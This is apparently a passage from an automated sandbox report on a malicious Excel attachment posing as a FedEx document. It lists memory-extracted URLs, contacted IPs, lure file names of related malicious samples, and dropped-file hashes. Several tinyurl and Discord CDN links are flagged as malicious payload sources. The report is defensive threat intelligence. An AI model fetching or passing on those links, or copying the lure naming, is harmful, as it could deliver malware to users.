http://www.e-trust.be/CPS/QNcerts	o.exe, 00000010.00000002.2141122352.000000001D0D7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/certicamaraca.crl0	o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	false		high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0	o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersroot.html0	o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%	o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.acabogacia.org0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.valicert.	o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ca.sia.it/seccli/repository/CPS0	o.exe, 00000010.00000002.2141296727.000000001D137000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/SGCA.crl0	o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0	o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.securetrust.com/STCA.crl0	o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0	o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icra.org/vocabulary/.	Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tinyurl.com	o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	false		high
http://www.certicamara.com/certicamaraca.crl0;	o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	false		high
http://www.e-szigno.hu/RootCA.crt0	o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	false		high
http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl0	o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadisglobal.com/cps0	o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	false		high
http://www.valicert.com/1	o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.e-szigno.hu/SZSZ/0	o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	Robocopy.exe, 00000007.00000002.2110204380.0000000002A40000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2133317799.0000000002530000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net0D	o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersignroot.html0	o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.sia.it/secsrv/repository/CRL.der0J	o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com	Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.20.138.65	unknown	United States		13335	CLOUDFLARENETUS	false
162.159.134.233	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	320331
Start date:	19.11.2020
Start time:	09:18:53
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	1099008FEDEX_090887766.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.expl.evad.winXLS@25/11@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.1% (good quality ratio 20.4%) Quality average: 61.7% Quality standard deviation: 39.2%
HCA Information:	Successful, ratio: 68% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 23.0.174.200, 23.0.174.185 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/320331/sample/1099008FEDEX_090887766.xls

Simulations

Behavior and APIs

Time	Type	Description
09:19:51	API Interceptor	2x Sleep call for process: Robocopy.exe modified
09:19:56	API Interceptor	230x Sleep call for process: o.exe modified
09:20:10	API Interceptor	441x Sleep call for process: vc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
104.20.138.65	SIN029088.xls	Get hash	malicious	Browse
	https://tinyurl.com/y5tjuap2	Get hash	malicious	Browse
	SMBS PO 30 quotation.xls	Get hash	malicious	Browse
	viaseating-666114_xls.HtMl	Get hash	malicious	Browse
	https://tinyurl.com/venmosupp	Get hash	malicious	Browse
	tetratech-907745_xls.HtMl	Get hash	malicious	Browse
	Waybill Invoice.xls	Get hash	malicious	Browse
	Waybill Invoice.xls	Get hash	malicious	Browse
	Overdue Payments.xls	Get hash	malicious	Browse
	ciechgroup-551288_xls.HtMl	Get hash	malicious	Browse
	OVERDUE INVOICE.xls	Get hash	malicious	Browse
	https://tinyurl.com/y5gq29fv	Get hash	malicious	Browse
	Quote Request October-2020.xls	Get hash	malicious	Browse
	https://tinyurl.com/y6484eaq	Get hash	malicious	Browse
	PROFORMA INVOICE INV-1.xls	Get hash	malicious	Browse
	https://naset.ocry.com/#astrid.bulder@rivm.nl	Get hash	malicious	Browse
	RFQ-SSM-RFQ 6682Q.xls	Get hash	malicious	Browse
	https://l.facebook.com/l.php?u=https%3A%2F%2Ftinyurl.com%2Fy3da9xbq%3Ffbclid%3DIwAR11jNtpFJqmHsfB6MuN4oB-gl7-RlVZqSgYIbmZW4ycJwtQ-tC85PzgLO4&h=AT1i9PU8X_itDVqe5yg4Afn5zFPp0KVwni5sQg-Oc5Yor7a-8EWrOl11b-y21X_Oi92_H_jMhPiEjm3aKUnMEib9p96Fuptgd9vraABiOS8AO8X86OxcPZyET7VlHYnKBg&__tn__=H-R&c[0]=AT26jLdBW-b9efDmUD2-IVQDmvnfjC8zMcJVpGrmXtfU07ZmaRqvjC3hcq86tiO8rGqmY2DrakboCaPRMLQtsl2m1yZfExawqplv_zZwazNNYlc2wsoaV6LvzXDEPrWYoMbJFnx7l8Qm7vznPPnkddWEuQ	Get hash	malicious	Browse
	https://tinyurl.com/yye5b9wx	Get hash	malicious	Browse
	https://u13276699.ct.sendgrid.net/ls/click?upn=5Fpa-2BwcykOBn6Ma9RKaj-2BR-2BXAkqaAzD0-2BeJhWRncBmVhntdewLTGQE9LR9oUB06iR7Kr23stCS-2BfYgHz-2FIBevOuLD8PI1fGVpHFFOa-2Fj-2FZo-3D-ARW_wLp2Jp4Cu8YTHi1H9-2BI0q-2FZVHdeFdHJPXUpY0EuPM9O-2FrpIviHmxJ0lbfO5SUzAcCRI7DkG63-2BKc9AYMS80KoYRuDJUDsjJvIYZ-2BH9Nma1KbhlKrII3uJDDBb-2Bf4uQv2GunoJ4M8Q8uCVDkVj1q0OTj-2BTqReVWyPweFygCudDYhLb6f5p8qTOR1G8rPs4GczaLW-2BSBi31FibOjZGvJ2hna7Wr5LAsT2oRf78QPEO-2FYI-3D	Get hash	malicious	Browse
162.159.134.233	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse
	LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe	Get hash	malicious	Browse
	LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe	Get hash	malicious	Browse
	http://cdn.discordapp.com/attachments/776234221668270104/776349109195898880/AWB_DHL733918737WA56301224799546260.pdf.7z	Get hash	malicious	Browse
	qelMUH5CPF.exe	Get hash	malicious	Browse
	RYnBavdgiB.exe	Get hash	malicious	Browse
	Invoice003421.xls	Get hash	malicious	Browse
	DHL_77232.exe	Get hash	malicious	Browse
	meuM3XoT15.exe	Get hash	malicious	Browse
	NlTPg85t5N.exe	Get hash	malicious	Browse
	WEIR RFQ# BJW 98728973 .doc	Get hash	malicious	Browse
	99GQMirv2r.exe	Get hash	malicious	Browse
	R#U00d6SLER Puchase_tcs 10-28-2020,pdf.exe	Get hash	malicious	Browse
	#U8ba2#U5355#U786e#U8ba4,pdf.exe	Get hash	malicious	Browse
	HSBC-0914.exe	Get hash	malicious	Browse
	Payment of bank details,zip.exe	Get hash	malicious	Browse
	Bkrndbc_Signed_.exe	Get hash	malicious	Browse
	DHL PARCEL AWB 1222576549.exe	Get hash	malicious	Browse
	hitna naredba.exe	Get hash	malicious	Browse
	PROFORMA INVOICE INV-1.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse	162.159.135.233
	9Pimjl3jyq.exe	Get hash	malicious	Browse	162.159.133.233
	D6vy84I7rJ.exe	Get hash	malicious	Browse	162.159.135.233
	Payment copy.doc	Get hash	malicious	Browse	162.159.129.233
	RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe	Get hash	malicious	Browse	162.159.133.233
	d6pj421rXA.exe	Get hash	malicious	Browse	162.159.130.233
	LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe	Get hash	malicious	Browse	162.159.134.233
	LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe	Get hash	malicious	Browse	162.159.134.233
	Order_Request_Retail_20-11691-AB.xlsx	Get hash	malicious	Browse	162.159.130.233
	http://cdn.discordapp.com/attachments/776234221668270104/776349109195898880/AWB_DHL733918737WA56301224799546260.pdf.7z	Get hash	malicious	Browse	162.159.134.233
	89BR0suQeS.exe	Get hash	malicious	Browse	162.159.133.233
	89BR0suQeS.exe	Get hash	malicious	Browse	162.159.133.233
	RBBD5vivZc.exe	Get hash	malicious	Browse	162.159.130.233
	S01NwVhW5A.exe	Get hash	malicious	Browse	162.159.133.233
	qelMUH5CPF.exe	Get hash	malicious	Browse	162.159.134.233
	o9Fr4K1qcu.exe	Get hash	malicious	Browse	162.159.135.233
	SecuriteInfo.com.Trojan.Siggen10.63473.17852.exe	Get hash	malicious	Browse	162.159.130.233
	IMG_P_O_RFQ-WSB_17025-ENd User-Evaluate.exe	Get hash	malicious	Browse	162.159.130.233
	GuYXnzIH45.exe	Get hash	malicious	Browse	162.159.130.233
	Jvdivmn_Signed_.exe	Get hash	malicious	Browse	162.159.129.233
tinyurl.com	SIN029088.xls	Get hash	malicious	Browse	104.20.139.65
	SIN029088.xls	Get hash	malicious	Browse	104.20.138.65
	https://tinyurl.com/y5tjuap2	Get hash	malicious	Browse	104.20.138.65
	SMBS PO 30 quotation.xls	Get hash	malicious	Browse	104.20.138.65
	https://tinyurl.com/y5tjuap2	Get hash	malicious	Browse	104.20.139.65
	http://tinyurl.com	Get hash	malicious	Browse	104.20.139.65
	viaseating-666114_xls.HtMl	Get hash	malicious	Browse	104.20.138.65
	https://tinyurl.com/venmosupp	Get hash	malicious	Browse	104.20.138.65
	WayBill Invoice.xls	Get hash	malicious	Browse	172.67.1.225
	WayBill Invoice.xls	Get hash	malicious	Browse	104.20.139.65
	WayBill Invoice.xls	Get hash	malicious	Browse	104.20.139.65
	tetratech-907745_xls.HtMl	Get hash	malicious	Browse	104.20.138.65
	Waybill Invoice.xls	Get hash	malicious	Browse	104.20.138.65
	Waybill Invoice.xls	Get hash	malicious	Browse	172.67.1.225
	Waybill Invoice.xls	Get hash	malicious	Browse	104.20.138.65
	rooney-eng-598583_xls.HtMl	Get hash	malicious	Browse	104.20.139.65
	Overdue Payments.xls	Get hash	malicious	Browse	172.67.1.225
	Overdue Payments.xls	Get hash	malicious	Browse	104.20.138.65
	New PO 9380.xls	Get hash	malicious	Browse	104.20.139.65
	New PO 9380.xls	Get hash	malicious	Browse	104.20.139.65

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	INQUIRY.exe	Get hash	malicious	Browse	104.27.152.230
	PO Quotation.jar	Get hash	malicious	Browse	104.20.22.46
	doc2227740.xls	Get hash	malicious	Browse	104.27.172.15
	PO Quotation.jar	Get hash	malicious	Browse	104.20.23.46
	doc2227740.xls	Get hash	malicious	Browse	104.27.173.15
	TRIAL-ORDER.exe	Get hash	malicious	Browse	104.18.57.249
	d11311145.xls	Get hash	malicious	Browse	104.27.173.15
	23692 ANRITSU PROBE po 29288.exe	Get hash	malicious	Browse	104.23.99.190
	d11311145.xls	Get hash	malicious	Browse	104.27.173.15
	PO #5618896.gz.exe	Get hash	malicious	Browse	104.23.98.190
	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse	162.159.134.233
	07DYwxlVm4.exe	Get hash	malicious	Browse	104.27.133.115
	9Pimjl3jyq.exe	Get hash	malicious	Browse	162.159.133.233
	af4db3a6b648b585f8e11b9ff5be73f2.exe	Get hash	malicious	Browse	104.27.133.115
	af4db3a6b648b585f8e11b9ff5be73f2.exe	Get hash	malicious	Browse	104.27.133.115
	https://www.vedansha.com/doc/office/LatestLOGOOfficeEncoded/LatestLOGOOfficeEncoded/RedirectPage/marc.loney@navitas.com	Get hash	malicious	Browse	172.67.38.66
	e2b97ee03b4b38578f04d0cc93d8effd.exe	Get hash	malicious	Browse	104.27.133.115
	https://app.archbee.io/doc/wjFBJ1IQgNqcYtxyaUfi5/V9dqJTS3iO58EgXIT7wr1	Get hash	malicious	Browse	104.17.234.61
	https://msgcash.com/click/NzhlMWY1MTltNzg3NS00ZDFmLTk1YmQtODZiZGQ3MzQwZGMz	Get hash	malicious	Browse	172.67.181.196
	bGtm3bQKUj.exe	Get hash	malicious	Browse	104.24.126.89
CLOUDFLARENETUS	INQUIRY.exe	Get hash	malicious	Browse	104.27.152.230
	PO Quotation.jar	Get hash	malicious	Browse	104.20.22.46
	doc2227740.xls	Get hash	malicious	Browse	104.27.172.15
	PO Quotation.jar	Get hash	malicious	Browse	104.20.23.46
	doc2227740.xls	Get hash	malicious	Browse	104.27.173.15
	TRIAL-ORDER.exe	Get hash	malicious	Browse	104.18.57.249
	d11311145.xls	Get hash	malicious	Browse	104.27.173.15
	23692 ANRITSU PROBE po 29288.exe	Get hash	malicious	Browse	104.23.99.190
	d11311145.xls	Get hash	malicious	Browse	104.27.173.15
	PO #5618896.gz.exe	Get hash	malicious	Browse	104.23.98.190
	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse	162.159.134.233
	07DYwxlVm4.exe	Get hash	malicious	Browse	104.27.133.115
	9Pimjl3jyq.exe	Get hash	malicious	Browse	162.159.133.233
	af4db3a6b648b585f8e11b9ff5be73f2.exe	Get hash	malicious	Browse	104.27.133.115
	af4db3a6b648b585f8e11b9ff5be73f2.exe	Get hash	malicious	Browse	104.27.133.115
	https://www.vedansha.com/doc/office/LatestLOGOOfficeEncoded/LatestLOGOOfficeEncoded/RedirectPage/marc.loney@navitas.com	Get hash	malicious	Browse	172.67.38.66
	e2b97ee03b4b38578f04d0cc93d8effd.exe	Get hash	malicious	Browse	104.27.133.115
	https://app.archbee.io/doc/wjFBJ1IQgNqcYtxyaUfi5/V9dqJTS3iO58EgXIT7wr1	Get hash	malicious	Browse	104.17.234.61
	https://msgcash.com/click/NzhlMWY1MTltNzg3NS00ZDFmLTk1YmQtODZiZGQ3MzQwZGMz	Get hash	malicious	Browse	172.67.181.196
	bGtm3bQKUj.exe	Get hash	malicious	Browse	104.24.126.89

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	VQ01173428.doc	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SIN029088.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SMBS PO 30 quotation.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.Mal.Generic-S.18660.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsm	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.Mal.Generic-S.27944.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsm	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	SecuriteInfo.com.Heur.5466.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	WayBill Invoice.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	WayBill Invoice.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	Untitled 20201030.doc	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	request.2890.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	request613.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	UW_Medley Storage_20201030.xlsm	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	Payment_Order_20201111.xlsx	Get hash	malicious	Browse	104.20.138.65 162.159.134.233
	Waybill Invoice.xls	Get hash	malicious	Browse	104.20.138.65 162.159.134.233

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1086014193077403
Encrypted:	false
SSDEEP:	6:kKRcswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:6vkPlE99SNxAhUegeT2
MD5:	9DEF0F7341591B35E18E1EC72060716B
SHA1:	4C65EEC14F5A712949520941655407C509B8646F
SHA-256:	E4558E5037D99FDCF8F262A2D3AEC3B7C3B021CB8432F5544D0BA04A471FB79F
SHA-512:	5151203DAE639BC669A3B8F946B995677602111318F17F65F16ABCBEE7E3CF3FEAD91821932B76037A946873CFDBEC17C9B80144E6192A960CFAC3D5455F14EE
Malicious:	false
Preview:	p...... ...........5....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Temp\7AFE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	52691
Entropy (8bit):	7.842958232827408
Encrypted:	false
SSDEEP:	1536:9VCQ1jTEb1JmSb4wjE7zF0Rhdv1hQzMrTRSu:9VCgEPb4GE0DrTcu
MD5:	9F7D6C154877F1CA028BAC51805FEC5E
SHA1:	4C6C49757FEB709A53772FAF175B8BBE23A31266
SHA-256:	F91A1405E53D8361265218CCCC5E5CD49B8C82E037943AF7B5A1B0DDCFF0E986
SHA-512:	43572CCE53C11C7B698824F10637964E93484C8A4BEFAE1CEF42DE14CD6D94CE442C7493A801175C18D4CC54346C975C65767A71894F31614EC2099216EA9EDD
Malicious:	false
Preview:	...N.0...H.C.+j.q@...........o.....lo..!....J.~..vc.&kk.O..........J.E.....[V`.N....l..&....&...vX.eJ.s.K..+.....G+.....B.....`p.w.\S.`.....I.tM..Hf..~.]F.L.`.....N.AJ?.k....K....B.. YS...._!%J..?..n...6...+"....."e...u.+..B>9^.V.L?0j....IX.._....j....6..X.Z....UV..N.....'.#...F..*m....nV....rb-.d..;.}]v.=q$.....).v.....1m...u.F.m..i.YE.[.......uq.._..H.#..Y..ZV... &..n;t.wDj..{3..8S...y3>.........PK..........!.R...............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...

C:\Users\user\AppData\Local\Temp\Cab4644.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Tar4645.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	data
Category:	dropped
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
